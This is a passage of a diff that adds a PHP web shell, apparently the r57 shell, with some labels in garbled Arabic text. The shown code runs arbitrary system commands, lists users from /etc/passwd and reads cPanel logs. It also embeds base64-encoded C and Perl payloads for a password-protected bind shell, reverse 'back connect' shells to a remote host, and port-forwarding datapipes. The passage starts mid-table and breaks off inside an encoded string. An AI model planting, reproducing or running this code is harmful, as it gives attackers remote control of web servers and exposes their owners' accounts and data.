+'ãÔÇåÏÉ ãáÝ ÇááæÞ áÏÎæá ÇáÓí ÈÇäá æÇáãæÇÞÚ Úáì ÇáÓíÑÝÑ'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=tahoma size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+  {
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=tahoma size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=tahoma size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=tahoma size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=tahoma size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die();
+  }
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;
+  foreach ($rows as $string)
+   {
+           $user = @explode(":",$string);
+           if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users;
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
